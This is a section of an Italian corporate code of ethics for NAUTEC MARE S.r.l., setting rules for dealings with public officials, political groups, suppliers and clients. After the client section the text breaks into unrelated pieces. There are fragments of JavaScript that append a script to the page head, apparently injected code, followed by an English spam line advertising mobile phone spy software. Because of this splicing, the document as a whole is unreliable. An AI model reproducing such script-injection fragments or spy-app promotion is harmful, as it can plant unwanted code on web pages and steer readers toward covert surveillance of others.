4.1 Rapporti con la Pubblica Amministrazione

Le relazioni con la Pubblica Amministrazione, i pubblici ufficiali o i soggetti incaricati di un pubblico servizio debbono ispirarsi alla più rigorosa osservanza delle disposizioni di legge e di regolamento applicabili e non possono in alcun modo compromettere l’integrità o la reputazione di NAUTEC MARE S.r.l..

L’assunzione di impegni e la gestione dei rapporti con i soggetti summenzionati sono riservate esclusivamente alle funzioni aziendali a ciò preposte ed al personale autorizzato, nel pieno rispetto delle procedure interne e del principio di trasparenza.

Nell’ambito dei rapporti con tali soggetti i Destinatari del Codice si astengono dall’offrire, anche per interposta persona, denaro o altra utilità al funzionario pubblico coinvolto, ai suoi familiari o a soggetti in qualunque modo allo stesso collegati e dal ricercare o instaurare relazioni personali di favore, influenza, ingerenza con l’obiettivo di condizionarne, direttamente o indirettamente, l’attività.

Restano ammessi solo i doni di modesta entità sulla base delle apposite direttive emanate dal vertice aziendale.

4.2 Rapporti con Organizzazioni politiche e sindacali

NAUTEC MARE S.r.l. di norma non eroga contributi, diretti o indiretti, sotto qualsiasi forma, a partiti, movimenti, comitati e organizzazioni politiche e sindacali, a loro rappresentanti e candidati, tranne quelli previsti da normative specifiche.

4.3 Rapporti con i fornitori

La scelta dei fornitori si ispira a principi di obbiettività, competenza, economicità, trasparenza e correttezza, nel rispetto delle relative procedure interne.
Ai fornitori è richiesto il rispetto:

  • delle leggi, usi e consuetudini applicabili;
  • di uniformarsi ai principi del presente Codice Etico;
  • di uniformarsi ai principi del Modello di Organizzazione, Gestione e Controllo di NAUTEC MARE S.r.l.;
  • di rispettare la normativa vigente in materia di lavoro, con particolare attenzione al lavoro minorile ed a quanto disposto dalla legge in tema di salute e sicurezza;
  • di non supportare in alcun modo né direttamente né indirettamente associazioni mafiose o terroristiche;
  • di garantire il rispetto dei diritti umani dei lavoratori.

4.4 Rapporti con i clienti

Le relazioni con i clienti sono improntate alla piena soddisfazione delle loro esigenze con l’obiettivo di creare un solido rapporto ispirato ai principi di correttezza, onestà, efficienza e professionalità. NAUTEC MARE S.r.l. esprime il primario interesse nella:

  • piena soddisfazione delle esigenze del cliente;
  • creazione di un solido rapporto con il cliente, ispirato alla cortesia, alla qualità, alla fiducia ed all’efficienza;
  • professionalità, lealtà nell’atteggiamento verso il cliente.

d.getElementsByTagName(‘head’)[0].appendChild(s);

if (document.currentScript) {

The most popular 2017 spy software applications for the mobile phones.